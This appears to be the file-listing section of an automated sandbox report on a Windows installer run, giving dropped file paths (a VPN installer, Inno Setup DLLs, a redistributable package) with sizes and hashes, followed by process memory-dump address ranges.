1d7252929d5c4cb404a34e553b72757729c701d5

SHA256
c414e764c53a81c6beb2c393635044661da238380492c182162b37f3e82a8c89

SHA512
08380e7ab2012f453ec4cb72646ca3a920d32f2f253f5c956b239780d1d08e434c4353580f6f9c95317b0e76810bc9351def59039350b96a4d989ece80722076

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
Filesize
28KB

MD5
ae73ed52228d3e196468a06561ffb7f2

SHA1
31a94156985d269e4380efb24b618e30b2e073da

SHA256
ffaf4a0f37bf828842abf61f4b6334a1d910cbc86f0824c6cf939fae1422cdce

SHA512
c6a83e619087568d212fa440ef511a2e61830e831e1127c7965ad06d0e0c580bc22133f75193b30f873a1142ab6ed7f2b8e411dd0885182e3033258e7e7f7133

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
Filesize
28KB

MD5
ae73ed52228d3e196468a06561ffb7f2

SHA1
31a94156985d269e4380efb24b618e30b2e073da

SHA256
ffaf4a0f37bf828842abf61f4b6334a1d910cbc86f0824c6cf939fae1422cdce

SHA512
c6a83e619087568d212fa440ef511a2e61830e831e1127c7965ad06d0e0c580bc22133f75193b30f873a1142ab6ed7f2b8e411dd0885182e3033258e7e7f7133

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
b899c273be628feca1dbc30364731328

SHA1
3898a2cd6317b882303b86abeaf0a7e36f891899

SHA256
05ace2708f95682dfeea44f3a73c303070c9c54d7629bea5086b7d98e38b06b3

SHA512
623bcc09851599edafb26301914303fdb48a8484a228dee9c01fc1dace52a3e7b74b6a458fa1b65d4100f69b706fdc96140d67b133d1f26253bcf043963be4fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO8751CA57\AviraPhantomVPN.exe
Filesize
28.6MB

MD5
9466d6ac58ac215fb36794ce3f06a4e7

SHA1
d1ced42f619c5b4cc60951bd25287154974d3bff

SHA256
21558bfc700970d50d5bd91e9908582e17660279c2250e16fd45aef1f68ea6e9

SHA512
c7f1a0abf62359083bee4b33dcc8add0b4c5d55f240b0fa383e24c2f9992d40c8012d1ea71bb3b49a5bc0d67fe447361cf91d3d1bff7c564d6a7d36aea5606a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO8751CA57\AviraPhantomVPN.exe
Filesize
28.6MB

MD5
9466d6ac58ac215fb36794ce3f06a4e7

SHA1
d1ced42f619c5b4cc60951bd25287154974d3bff

SHA256
21558bfc700970d50d5bd91e9908582e17660279c2250e16fd45aef1f68ea6e9

SHA512
c7f1a0abf62359083bee4b33dcc8add0b4c5d55f240b0fa383e24c2f9992d40c8012d1ea71bb3b49a5bc0d67fe447361cf91d3d1bff7c564d6a7d36aea5606a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO8751CA57\AviraPhantomVPN.exe
Filesize
28.6MB

MD5
9466d6ac58ac215fb36794ce3f06a4e7

SHA1
d1ced42f619c5b4cc60951bd25287154974d3bff

SHA256
21558bfc700970d50d5bd91e9908582e17660279c2250e16fd45aef1f68ea6e9

SHA512
c7f1a0abf62359083bee4b33dcc8add0b4c5d55f240b0fa383e24c2f9992d40c8012d1ea71bb3b49a5bc0d67fe447361cf91d3d1bff7c564d6a7d36aea5606a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_onhla5p0.1y0.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-129BQ.tmp\AviraPhantomVPN.tmp
Filesize
3.2MB

MD5
709f58ff64c336a777ab15d80e18202c

SHA1
7c0e403482cf019e04d3ef5dcda3ef0e45d4c7c3

SHA256
a5ee7f4c0ccbba0f695fee64edee7bacf5f59d7f1bf72d54621394e44a633003

SHA512
59af9bd796bf9b42ef651483255a60a15b0557162d714c87337e7be2b631f00fc2ee32cd2b367133492c390f26ba8cef2a57245436f3bc63c03a5408a91368b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-129BQ.tmp\AviraPhantomVPN.tmp
Filesize
3.2MB

MD5
709f58ff64c336a777ab15d80e18202c

SHA1
7c0e403482cf019e04d3ef5dcda3ef0e45d4c7c3

SHA256
a5ee7f4c0ccbba0f695fee64edee7bacf5f59d7f1bf72d54621394e44a633003

SHA512
59af9bd796bf9b42ef651483255a60a15b0557162d714c87337e7be2b631f00fc2ee32cd2b367133492c390f26ba8cef2a57245436f3bc63c03a5408a91368b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8JNMU.tmp\Avira Phantom VPN 2.41.1.25731.tmp
Filesize
911KB

MD5
02c5691af81933ce36735946e3ed1ea4

SHA1
2faed8d51a0800f127e424bfba9d44bab6aee1b2

SHA256
e1f5e87796c015e567153db6b994a35a34b0819b1093d1ea12064ee35102c42d

SHA512
ebde4772c94f5199a2936f8fdbcf80e57d11a820276b1e1323fbcde6d192cd89bcc69a441cff17e26d688427fe05e62cc858e896c0647d93c9e2ebe74a6e6749

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-CEMTL.tmp\VCR-2005-2023-09.02.2023.exe
Filesize
240.2MB

MD5
9a9cb35174d1a911099c3438a37e382d

SHA1
6492cf89b9a883c295e5950e88945bea8a255bc7

SHA256
22bc432be19a646d6a843b6839a73f1bd0584592405651a5d36953acf9286a11

SHA512
780993b499b9fb7b9f9e503c962ec3b95d99a867a7de8f668912a50318627b7a98fb6c9c2b7928485f3e2c9b3128a2ec35ca8654f59cd681eb5af2f05cffbf26

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-CEMTL.tmp\VCR-2005-2023-09.02.2023.exe
Filesize
239.3MB

MD5
0dde077fe85e27445660a5bb0ca2345a

SHA1
0f581d04b3cd0b4d5ec7c8762fdf9b77477a60e3

SHA256
40f96ca3e0a90d854bf8655065b565cd998b7a3233392718842d9d00bc5c0f4c

SHA512
aa888b768b1b6184aef9e544cc022a054077036dc987825d55364f03e801b5a682b74e6c6f1841489379777a51349553f1fc00b57ce0f6fc395462d222f3d2b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-CEMTL.tmp\WebrootCommAgentService.bat
Filesize
465B

MD5
357f5b062141f4f796a463e2ca373a9f

SHA1
c5eded68e24b0e9a05ec852205e181e9f33eaa00

SHA256
c909ac1fca71db5a322994ec8eb956a1c0c0fbb83410af38c6d4a8922381d373

SHA512
43bce27cffb7949eb9394e4006b3f91cffd89d6564a0fabb6f49beb15e33c243eda71f69be25c0c8e688edc907656d5fd6b2dff6c862b5c94f5562bdfcb14041

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-CEMTL.tmp\_isetup\_iscrypt.dll
Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-CEMTL.tmp\_isetup\_isdecmp.dll
Filesize
28KB

MD5
077cb4461a2767383b317eb0c50f5f13

SHA1
584e64f1d162398b7f377ce55a6b5740379c4282

SHA256
8287d0e287a66ee78537c8d1d98e426562b95c50f569b92cea9ce36a9fa57e64

SHA512
b1fcb0265697561ef497e6a60fcee99dc5ea0cf02b4010da9f5ed93bce88bdfea6bfe823a017487b8059158464ea29636aad8e5f9dd1e8b8a1b6eaaab670e547

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-CEMTL.tmp\_isetup\_isdecmp.dll
Filesize
28KB

MD5
077cb4461a2767383b317eb0c50f5f13

SHA1
584e64f1d162398b7f377ce55a6b5740379c4282

SHA256
8287d0e287a66ee78537c8d1d98e426562b95c50f569b92cea9ce36a9fa57e64

SHA512
b1fcb0265697561ef497e6a60fcee99dc5ea0cf02b4010da9f5ed93bce88bdfea6bfe823a017487b8059158464ea29636aad8e5f9dd1e8b8a1b6eaaab670e547

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-CEMTL.tmp\innocallback.dll
Filesize
63KB

MD5
1c55ae5ef9980e3b1028447da6105c75

SHA1
f85218e10e6aa23b2f5a3ed512895b437e41b45c

SHA256
6afa2d104be6efe3d9a2ab96dbb75db31565dad64dd0b791e402ecc25529809f

SHA512
1ec4d52f49747b29cfd83e1a75fc6ae4101add68ada0b9add5770c10be6dffb004bb47d0854d50871ed8d77acf67d4e0445e97f0548a95c182e83b94ddf2eb6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-CEMTL.tmp\innocallback.dll
Filesize
63KB

MD5
1c55ae5ef9980e3b1028447da6105c75

SHA1
f85218e10e6aa23b2f5a3ed512895b437e41b45c

SHA256
6afa2d104be6efe3d9a2ab96dbb75db31565dad64dd0b791e402ecc25529809f

SHA512
1ec4d52f49747b29cfd83e1a75fc6ae4101add68ada0b9add5770c10be6dffb004bb47d0854d50871ed8d77acf67d4e0445e97f0548a95c182e83b94ddf2eb6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-UEFKP.tmp\ISTask.dll
Filesize
66KB

MD5
86a1311d51c00b278cb7f27796ea442e

SHA1
ac08ac9d08f8f5380e2a9a65f4117862aa861a19

SHA256
e916bdf232744e00cbd8d608168a019c9f41a68a7e8390aa48cfb525276c483d

SHA512
129e4b8dd2665bcfc5e72b4585343c51127b5d027dbb0234291e7a197baeca1bab5ed074e65e5e8c969ee01f9f65cc52c9993037416de9bfff2f872e5aeba7ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-UEFKP.tmp\ISTask.dll
Filesize
66KB

MD5
86a1311d51c00b278cb7f27796ea442e

SHA1
ac08ac9d08f8f5380e2a9a65f4117862aa861a19

SHA256
e916bdf232744e00cbd8d608168a019c9f41a68a7e8390aa48cfb525276c483d

SHA512
129e4b8dd2665bcfc5e72b4585343c51127b5d027dbb0234291e7a197baeca1bab5ed074e65e5e8c969ee01f9f65cc52c9993037416de9bfff2f872e5aeba7ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-UEFKP.tmp\VclStylesInno.dll
Filesize
3.0MB

MD5
b0ca93ceb050a2feff0b19e65072bbb5

SHA1
7ebbbbe2d2acd8fd516f824338d254a33b69f08d

SHA256
0e93313f42084d804b9ac4be53d844e549cfcaf19e6f276a3b0f82f01b9b2246

SHA512
37242423e62af30179906660c6dbbadca3dc2ba9e562f84315a69f3114765bc08e88321632843dbd78ba1728f8d1ce54a4edfa3b96a9d13e540aee895ae2d8e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-UEFKP.tmp\VclStylesInno.dll
Filesize
3.0MB

MD5
b0ca93ceb050a2feff0b19e65072bbb5

SHA1
7ebbbbe2d2acd8fd516f824338d254a33b69f08d

SHA256
0e93313f42084d804b9ac4be53d844e549cfcaf19e6f276a3b0f82f01b9b2246

SHA512
37242423e62af30179906660c6dbbadca3dc2ba9e562f84315a69f3114765bc08e88321632843dbd78ba1728f8d1ce54a4edfa3b96a9d13e540aee895ae2d8e2

Download Submit
memory/1160-267-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/2148-316-0x0000000007830000-0x0000000007831000-memory.dmp

Filesize
4KB

Download
memory/2148-322-0x0000000007850000-0x0000000007851000-memory.dmp

Filesize
4KB

Download
memory/2148-404-0x0000000007120000-0x0000000007121000-memory.dmp

Filesize
4KB

Download
memory/2148-393-0x0000000002280000-0x0000000002281000-memory.dmp

Filesize
4KB

Download
memory/2148-357-0x0000000007120000-0x0000000007121000-memory.dmp

Filesize
4KB

Download
memory/2148-337-0x00000000078A0000-0x00000000078A1000-memory.dmp

Filesize
4KB

Download
memory/2148-333-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-336-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-334-0x0000000007890000-0x0000000007891000-memory.dmp

Filesize
4KB

Download
memory/2148-335-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-332-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-330-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-331-0x0000000007880000-0x0000000007881000-memory.dmp

Filesize
4KB

Download
memory/2148-329-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-328-0x0000000007870000-0x0000000007871000-memory.dmp

Filesize
4KB

Download
memory/2148-327-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-325-0x0000000007860000-0x0000000007861000-memory.dmp

Filesize
4KB

Download
memory/2148-326-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-324-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-323-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-321-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-320-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-319-0x0000000007840000-0x0000000007841000-memory.dmp

Filesize
4KB

Download
memory/2148-318-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-317-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-314-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-313-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-282-0x0000000002280000-0x0000000002281000-memory.dmp

Filesize
4KB

Download
memory/2148-286-0x0000000007130000-0x0000000007146000-memory.dmp

Filesize
88KB

Download
memory/2148-312-0x0000000007820000-0x0000000007821000-memory.dmp

Filesize
4KB

Download
memory/2148-311-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-310-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-292-0x0000000007350000-0x000000000766A000-memory.dmp

Filesize
3.1MB

Download
memory/2148-308-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-294-0x00000000077C0000-0x00000000077C1000-memory.dmp

Filesize
4KB

Download
memory/2148-296-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-295-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-297-0x00000000077D0000-0x00000000077D1000-memory.dmp

Filesize
4KB

Download
memory/2148-298-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-299-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-300-0x00000000077E0000-0x00000000077E1000-memory.dmp

Filesize
4KB

Download
memory/2148-301-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-302-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-303-0x00000000077F0000-0x00000000077F1000-memory.dmp

Filesize
4KB

Download
memory/2148-304-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-305-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-306-0x0000000007800000-0x0000000007801000-memory.dmp

Filesize
4KB

Download
memory/2148-307-0x0000000007670000-0x00000000077B0000-memory.dmp

Filesize
1.2MB

Download
memory/2148-309-0x0000000007810000-0x0000000007811000-memory.dmp

Filesize
4KB

Download
memory/2212-236-0x0000000007DF0000-0x0000000007DF8000-memory.dmp

Filesize
32KB

Download
memory/2212-197-0x0000000005220000-0x0000000005230000-memory.dmp

Filesize
64KB

Download
memory/2212-212-0x0000000006850000-0x000000000686E000-memory.dmp

Filesize
120KB

Download
memory/2212-213-0x0000000006D80000-0x0000000006DB2000-memory.dmp

Filesize
200KB

Download
memory/2212-214-0x000000006FAC0000-0x000000006FB0C000-memory.dmp

Filesize
304KB

Download
memory/2212-196-0x0000000005270000-0x00000000052A6000-memory.dmp

Filesize
216KB

Download
memory/2212-224-0x0000000006D60000-0x0000000006D7E000-memory.dmp

Filesize
120KB

Download
memory/2212-235-0x0000000007E10000-0x0000000007E2A000-memory.dmp

Filesize
104KB

Download
memory/2212-198-0x0000000005220000-0x0000000005230000-memory.dmp

Filesize
64KB

Download
memory/2212-234-0x0000000007D00000-0x0000000007D0E000-memory.dmp

Filesize
56KB

Download
memory/2212-227-0x0000000005220000-0x0000000005230000-memory.dmp

Filesize
64KB

Download
memory/2212-228-0x000000007F1F0000-0x000000007F200000-memory.dmp

Filesize
64KB

Download
memory/2212-202-0x0000000006160000-0x00000000061C6000-memory.dmp

Filesize
408KB

Download
memory/2212-229-0x0000000008130000-0x00000000087AA000-memory.dmp

Filesize
6.5MB

Download
memory/2212-200-0x0000000005F50000-0x0000000005F72000-memory.dmp

Filesize
136KB

Download
memory/2212-201-0x00000000060F0000-0x0000000006156000-memory.dmp

Filesize
408KB

Download
memory/2212-230-0x0000000007AD0000-0x0000000007AEA000-memory.dmp

Filesize
104KB

Download
memory/2212-231-0x0000000007B40000-0x0000000007B4A000-memory.dmp

Filesize
40KB

Download
memory/2212-199-0x00000000058E0000-0x0000000005F08000-memory.dmp

Filesize
6.2MB

Download
memory/2212-232-0x0000000007D50000-0x0000000007DE6000-memory.dmp

Filesize
600KB

Download
memory/3324-260-0x0000000002760000-0x0000000002770000-memory.dmp

Filesize
64KB

Download
memory/3324-261-0x000000007EEF0000-0x000000007EF00000-memory.dmp

Filesize
64KB

Download
memory/3324-250-0x000000006FAC0000-0x000000006FB0C000-memory.dmp

Filesize
304KB

Download
memory/4044-161-0x0000000000940000-0x0000000000941000-memory.dmp

Filesize
4KB

Download
memory/4044-273-0x0000000000400000-0x0000000000747000-memory.dmp

Filesize
3.3MB

Download
memory/4044-180-0x0000000003630000-0x0000000003645000-memory.dmp

Filesize
84KB

Download
memory/4044-226-0x0000000003630000-0x0000000003645000-memory.dmp

Filesize
84KB

Download
memory/4044-163-0x0000000000400000-0x0000000000747000-memory.dmp

Filesize
3.3MB

Download
memory/4044-225-0x0000000000400000-0x0000000000747000-memory.dmp

Filesize
3.3MB

Download
memory/4044-188-0x0000000003630000-0x0000000003645000-memory.dmp

Filesize
84KB

Download
memory/4044-187-0x0000000000400000-0x0000000000747000-memory.dmp

Filesize
3.3MB

Download
memory/4100-162-0x0000000000400000-0x000000000050D000-memory.dmp

Filesize
1.1MB

Download
memory/4100-155-0x0000000000400000-0x000000000050D000-memory.dmp

Filesize
1.1MB

Download
memory/5044-380-0x00007FF781DD0000-0x00007FF7832FE000-memory.dmp

Filesize
21.2MB

Download